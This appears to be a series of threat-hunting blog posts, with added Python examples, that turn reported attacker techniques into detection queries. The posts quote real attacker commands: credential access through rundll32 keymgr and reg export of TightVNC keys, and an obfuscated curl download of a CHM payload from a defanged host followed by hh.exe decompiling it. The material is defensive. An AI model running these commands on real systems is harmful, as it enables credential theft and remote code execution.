Posts

384. Adversaries Abuse Spotify and Chess.com

Hello everyone! Another day, another Dead Drop Resolver (T1102.001). And this time, the exploited web services are even more interesting than usual. According to Solar's research on MaskGram Stealer, in addition to the platforms already popular among attackers, Steam and Telegram, threat actors also used Spotify and Chess.com. As before, it's important to pay attention to communications with legitimate web services that attackers leverage as part of this technique, and to identify unusual processes:

event_type: "dnsreqwin" AND dns_rname: ("spotify.com" OR "chess.com") AND NOT proc_file_path: ("your_exclusion_list")

See you soon!

383. Hunting for Warlock's Tactics, Techniques and Procedures

Hello everyone! Today we'll go over several techniques from the Warlock ransomware attack report that caught my attention. So, the first technique is Windows Credential Manager (T1555.004). The attackers used the following command to access saved passwords:

C:\Windows\System32\rundll32.exe keymgr.dll,KRShowKeyMgr

This kind of behavioral indicator isn't very common, so it works well for threat hunting:

event_type: "processcreatewin" AND proc_file_path: "rundll32.exe" AND cmdline: ("keymgr.dll" AND "KRShowKeyMgr")

The next technique is PowerShell (T1059.001). This time, the attackers abused it to enable PowerShell Remoting:

C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe "Enable-PSRemoting -Force -SkipNetworkProfileCheck"

Although this behavior can be legitimate, it's still a good target for threat hunting:

event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: "Enable-PSRemo...

382. Handala Hack Abuses NetBird

Hello everyone! Today we'll look at another interesting example of the following technique: Remote Access Tools (T1219). Scrolling through the report on Handala Hack's modus operandi, I spotted an interesting tool abused by the threat actors. I'm talking about NetBird. The attackers leveraged it to reach hosts that were not directly accessible from outside the network. The tool has no detections on VirusTotal and may be a good target for hunting, for example:

event_type: "processcreatewin" AND proc_file_productname: "netbird"

See you soon!

381. In Some Cases, Attackers Can Simply Export Your Passwords

Hello everyone! Today we'll once again talk about the Windows Registry and look at an example of the Unsecured Credentials: Credentials in Registry (T1552.002) technique. While reading an investigation report on the CL-UNK-1068 attacks in South, Southeast, and East Asia, I once again noticed that attackers actively abused reg.exe. In particular, they frequently used the export parameter, for example:

reg export "HKEY_USERS\[%SID%]\SOFTWARE\TightVNC\Server"
reg export HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TightVNC\Server
reg export HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server

In this case, the attacker exports the TightVNC configuration from the registry in order to obtain credentials. For detection, we can either use specific registry keys that contain sensitive data or proactively search for suspicious export events:

event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: "export"

See you soon!
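The process-creation hunts in posts 383, 382 and 381 all share one shape: an event type, an image name or product name, and one or more command-line tokens joined by AND. The added example below (my code, not the author's tooling) evaluates those four rules over a handful of constructed events that use the page's field names (event_type, proc_file_path, proc_file_productname, cmdline). The file-name comparison and the case-insensitive substring semantics are assumptions about how the author's search platform matches; adjust them to your own.

```python
"""Evaluate the process-creation hunting queries from posts 383, 382 and 381
over constructed sample telemetry. Added example; rules and events are
modelled on the posts, the events themselves are invented."""
import ntpath
from dataclasses import dataclass
from typing import Optional, Tuple

# Constructed events. Field names follow the posts; values are made up,
# except the command lines quoted in the posts themselves.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"C:\Windows\System32\rundll32.exe keymgr.dll,KRShowKeyMgr"},
    {"event_type": "processcreatewin",  # benign rundll32 use, must not match
     "proc_file_path": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe "Enable-PSRemoting -Force -SkipNetworkProfileCheck"'},
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Program Files\NetBird\netbird.exe",
     "proc_file_productname": "NetBird",
     "cmdline": "netbird.exe up"},
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg export "HKEY_USERS\S-1-5-21-1-2-3-1001\SOFTWARE\TightVNC\Server" C:\Users\Public\vnc.reg'},
    {"event_type": "processcreatewin",  # reg.exe without export, must not match
     "proc_file_path": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},
    {"event_type": "dnsreqwin",  # wrong event type, must not match
     "proc_file_path": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg export HKLM\SOFTWARE\TightVNC\Server"},
]


@dataclass
class HuntRule:
    name: str
    technique: str
    event_type: str
    image: Optional[str] = None            # compared with the file name of proc_file_path
    productname: Optional[str] = None      # substring of proc_file_productname
    cmdline_all: Tuple[str, ...] = ()      # every token must appear in cmdline (AND)

    def matches(self, ev: dict) -> bool:
        if ev.get("event_type") != self.event_type:
            return False
        if self.image is not None:
            if ntpath.basename(ev.get("proc_file_path", "")).lower() != self.image.lower():
                return False
        if self.productname is not None:
            if self.productname.lower() not in ev.get("proc_file_productname", "").lower():
                return False
        cmd = ev.get("cmdline", "").lower()
        return all(tok.lower() in cmd for tok in self.cmdline_all)


RULES = [
    HuntRule("rundll32 KRShowKeyMgr", "T1555.004", "processcreatewin",
             image="rundll32.exe", cmdline_all=("keymgr.dll", "KRShowKeyMgr")),
    HuntRule("Enable-PSRemoting", "T1059.001", "processcreatewin",
             image="powershell.exe", cmdline_all=("Enable-PSRemoting",)),
    HuntRule("NetBird product name", "T1219", "processcreatewin",
             productname="netbird"),
    HuntRule("reg.exe export", "T1552.002", "processcreatewin",
             image="reg.exe", cmdline_all=("export",)),
]


def run_hunt(events, rules=RULES) -> dict:
    """Return {rule name: [matching command lines]} so results can be triaged per rule."""
    hits = {}
    for rule in rules:
        matched = [ev["cmdline"] for ev in events if rule.matches(ev)]
        if matched:
            hits[rule.name] = matched
    return hits


if __name__ == "__main__":
    for name, cmds in run_hunt(SAMPLE_EVENTS).items():
        print(name)
        for c in cmds:
            print("   ", c)
```

Each rule yields exactly one hit against the sample set; the benign rundll32 call, the reg query and the mis-typed event are all left out, which is the behaviour you want to confirm before pointing a rule at production telemetry.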

380. Hunting for Suspicious System Language Discovery Events

Hello everyone! Sometimes, even if a victim runs a malicious file, the system may still avoid compromise. One reason for this is the use of the System Location Discovery: System Language Discovery (T1614.001) technique. The point is that in some cases attackers do not want their malware to run on systems located in certain countries. Today we'll look at an example of how attackers restrict the download of a stealer for systems that may be located in CIS countries. So, the loader for the SHub stealer targeting macOS used the following command to obtain information about the language of the compromised system:

defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources 2>/dev/null | grep -qi russian

The AppleEnabledInputSources key in the com.apple.HIToolbox.plist file contains information about keyboard layouts. Its contents are checked for the presence of the Russian language, which is typical for CIS systems. A good detection opportunity is suspicious...

379. Hunting for Suspicious Compiled HTML Files

Hello everyone! Today we'll take a look at a technique that isn't very common. Nevertheless, it occasionally appears in attackers' toolkits. This is System Binary Proxy Execution: Compiled HTML File (T1218.001). This technique is often used in the early stages of the cyberattack lifecycle. For example, attackers may distribute malicious CHM files inside archives as attachments in phishing emails. Let's look at an example. In this case, the attackers used an archive containing a shortcut with the following command:

"C:\Windows\System32\rundll32.exe" shell32.dll ShellExec_RunDLL conhost --headless cmd /c curl www.360printsol[.]com/2026/alfadhalah/thumbnail?img=index.png -L""skontv&hh -d""ecompile^ . nt""v&0.ln""k

In this scenario, the CHM file is downloaded from a remote web resource and extracted using Windows HTML Help (hh.exe) with the -decompile argument. In the context of threat hunting, we can look for events in...
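The command line above never contains the literal string -decompile: the argument is split by an empty quote pair ("") and terminated with a cmd.exe escape caret (^), so a plain substring hunt for hh.exe with -decompile would miss it. The added example below (my code, not from the post) normalises those two cmd.exe tricks before matching, then looks for an hh / hh.exe token followed by -decompile in any of the chained sub-commands. The sample command lines are constructed for the example and are not the page's indicators.

```python
"""Hunt for hh.exe -decompile (T1218.001) through cmd.exe obfuscation.
Added example; the normalisation covers only the two tricks visible in the
post (empty "" pairs and ^ escapes), not every cmd.exe obfuscation."""
import re

# Constructed sample command lines (not the page's IoCs).
SAMPLE_CMDLINES = [
    # obfuscated: "" splits -decompile, ^ escapes the following space
    r'cmd /c curl http://example.invalid/a.png -o a.chm & hh -d""ecompile^ . a.ch""m',
    # benign: hh.exe opening a help file, no decompile
    r'"C:\Windows\hh.exe" C:\Windows\Help\ntart.chm',
    # plain, unobfuscated decompile
    r'hh.exe -decompile C:\Users\Public\out C:\Users\Public\doc.chm',
    # proxied through rundll32/conhost/cmd as in the post, still obfuscated
    r'"C:\Windows\System32\rundll32.exe" shell32.dll ShellExec_RunDLL conhost --headless '
    r'cmd /c curl http://example.invalid/t.png -o x.chm & hh -d""ecompile^ . x.ch""m',
    # -decompile on a different binary, must not match
    r'notepad.exe -decompile.txt',
]


def normalize_cmdline(cmdline: str) -> str:
    """Undo two cmd.exe tricks that defeat substring matching.

    An empty quote pair "" inside a token is removed by the Windows argument
    parser before the program sees it, and cmd.exe drops a lone ^ escape
    character. Limitation: a deliberate empty "" argument is removed too."""
    return cmdline.replace('""', '').replace('^', '')


def split_subcommands(cmdline: str):
    """Split on the cmd.exe command separators &, &&, | and ||."""
    return [part.strip() for part in re.split(r'&&|\|\||[&|]', cmdline) if part.strip()]


def _basename(token: str) -> str:
    return token.strip('"').rsplit('\\', 1)[-1]


def is_chm_decompile(cmdline: str) -> bool:
    """True when any sub-command invokes hh or hh.exe with -decompile after it."""
    for sub in split_subcommands(normalize_cmdline(cmdline)):
        toks = sub.lower().split()
        for i, tok in enumerate(toks):
            if _basename(tok) in ("hh", "hh.exe") and "-decompile" in toks[i + 1:]:
                return True
    return False


if __name__ == "__main__":
    for raw in SAMPLE_CMDLINES:
        flag = "HIT " if is_chm_decompile(raw) else "    "
        print(flag, raw)
```

Running the block flags samples 1, 3 and 4 and leaves the benign help-file launch and the notepad line alone. Note that the raw first sample does not contain "-decompile" at all, which is exactly why the normalisation step has to run before the token check.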

378. Hunting for APT37: Zoho WorkDrive Abuse

Hello everyone! Today we'll talk about another legitimate service that attackers abuse, in this case APT37. And of course, we'll look at how to use this information for proactive threat hunting. So, in one of APT37's fairly recent campaigns (we track this cluster as Squid Werewolf), they used the RESTLEAF implant, which abused Zoho WorkDrive, a cloud-based file management and collaboration platform. From a proactive hunting perspective, we can identify all network communications related to Zoho WorkDrive and then separate the legitimate events:

event_type: "dnsreqwin" AND dns_rname: "workdrive.zohoexternal.com"

See you soon!
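Posts 384 and 378 hunt the same way: match DNS requests for a legitimate service abused as a dead drop, then peel off the processes that are expected to talk to it. The added example below (my code, not the author's queries) runs that logic over constructed dnsreqwin events for spotify.com, chess.com and workdrive.zohoexternal.com, applies a process exclusion list, and also stacks the remaining requests per process so the unusual requesters stand out. It assumes the author's dns_rname match covers subdomains (so api.spotify.com counts as spotify.com); if your platform matches exact names only, list the subdomains you see explicitly.

```python
"""Dead Drop Resolver (T1102.001) hunt over DNS telemetry, mirroring the
dns_rname / proc_file_path exclusion pattern of posts 384 and 378.
Added example; domains come from the posts, everything else is constructed."""
import ntpath
from collections import Counter

WATCHED_DOMAINS = ("spotify.com", "chess.com", "workdrive.zohoexternal.com")

# Constructed exclusion list (stands in for "your_exclusion_list" in the post):
# full image paths of processes that are expected to resolve these services.
EXCLUDED_PROCESSES = {
    r"c:\users\alice\appdata\roaming\spotify\spotify.exe",
    r"c:\program files\google\chrome\application\chrome.exe",
}

# Constructed dnsreqwin events.
SAMPLE_EVENTS = [
    {"event_type": "dnsreqwin", "dns_rname": "api.spotify.com",
     "proc_file_path": r"C:\Users\alice\AppData\Roaming\Spotify\Spotify.exe"},
    {"event_type": "dnsreqwin", "dns_rname": "www.chess.com",
     "proc_file_path": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"event_type": "dnsreqwin", "dns_rname": "open.spotify.com",
     "proc_file_path": r"C:\Users\alice\AppData\Local\Temp\update.exe"},
    {"event_type": "dnsreqwin", "dns_rname": "workdrive.zohoexternal.com",
     "proc_file_path": r"C:\ProgramData\svc\host.exe"},
    {"event_type": "dnsreqwin", "dns_rname": "notchess.com",  # suffix look-alike, must not match
     "proc_file_path": r"C:\Users\alice\AppData\Local\Temp\update.exe"},
    {"event_type": "processcreatewin", "dns_rname": "chess.com",  # wrong event type
     "proc_file_path": r"C:\Users\alice\AppData\Local\Temp\update.exe"},
]


def domain_matches(qname: str, watched=WATCHED_DOMAINS) -> bool:
    """Exact or subdomain match; 'notchess.com' must not match 'chess.com'."""
    q = qname.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in watched)


def hunt_dead_drop(events, watched=WATCHED_DOMAINS, excluded=EXCLUDED_PROCESSES):
    """Return (process file name, queried name) for every non-excluded request
    to a watched service, in event order."""
    hits = []
    for ev in events:
        if ev.get("event_type") != "dnsreqwin":
            continue
        if not domain_matches(ev.get("dns_rname", ""), watched):
            continue
        if ev.get("proc_file_path", "").lower() in excluded:
            continue
        hits.append((ntpath.basename(ev["proc_file_path"]), ev["dns_rname"]))
    return hits


def stack_by_process(events, **kw) -> Counter:
    """Count remaining hits per process: the long tail of rare requesters is
    where the dead-drop clients usually sit."""
    return Counter(proc for proc, _ in hunt_dead_drop(events, **kw))


if __name__ == "__main__":
    for proc, count in stack_by_process(SAMPLE_EVENTS).most_common():
        print(f"{count:3d}  {proc}")
    for proc, qname in hunt_dead_drop(SAMPLE_EVENTS):
        print(f"    {proc} -> {qname}")
```

On the sample set only update.exe resolving open.spotify.com and host.exe resolving workdrive.zohoexternal.com survive the exclusion list; the Spotify client and the browser are dropped, and the notchess.com look-alike never matches because the check requires a dot boundary.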